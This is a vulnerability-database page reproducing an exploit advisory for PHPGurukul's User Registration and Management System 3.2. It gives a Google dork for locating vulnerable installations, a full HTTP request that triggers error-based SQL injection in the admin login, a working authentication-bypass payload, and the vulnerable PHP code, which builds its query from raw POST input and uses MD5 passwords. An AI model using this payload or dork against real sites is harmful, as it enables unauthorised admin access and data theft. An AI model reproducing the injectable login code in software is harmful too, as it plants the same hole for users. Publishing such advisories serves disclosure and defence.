Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormBRpsdPACKETSTORM:179147
HistoryJun 19, 2024 - 12:00 a.m.

User Registration And Management System 3.2 SQL Injection

2024-06-1900:00:00
bRpsd
packetstormsecurity.com
83
web based technology
user database management
vulnerability
sql injection
authentication bypass
admin login
user details
php gurukul
product version 3.2
mysql
exploit
vendor
google dorks
login system
exploit author.

7.4 High

AI Score

Confidence

Low

JSON
`@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
.:. Exploit Title > User Registration & Management System - SQLi  
.:. Google Dorks .:.  
inurl:loginsystem/index.php  
.:. Date: June 18, 2024  
.:. Exploit Author: bRpsd  
.:. Contact: cy[at]live.no  
.:. Vendor -> https://phpgurukul.com/  
.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003  
.:. Product Version -> Version 3.2  
.:. DBMS -> MySQL  
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
#############  
|DESCRIPTION|  
#############  
"User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."  
===========================================================================================  
Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass  
Types: error-based  
File: localhost/admin/index.php  
Vul Parameter: USERNAME [POST]  
POST PoC #1: http://tom:8080/loginsystem/admin/index.php  
Host: tom  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 38  
Origin: http://tom  
Connection: keep-alive  
Referer: http://tom/loginsystem/admin/index.php  
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a  
Upgrade-Insecure-Requests: 1  
username='&password=test&login=  
Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9  
===========================================================================================  
Test #2 => Payload to skip authentication  
http://localhost:9000/loginsystem/admin/index.php  
username=A' OR 1=1#&password=1&login=  
Response:  
302 redirect to dashboard.php  
===========================================================================================  
Vuln File:/loginsystem/admin/index.php  
Vul Code:  
<?php session_start();  
include_once('../includes/config.php');  
// Code for login  
if(isset($_POST['login']))  
{  
$adminusername=$_POST['username'];  
$pass=md5($_POST['password']);  
$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");  
$num=mysqli_fetch_array($ret);  
if($num>0)  
`

7.4 High

AI Score

Confidence

Low

JSON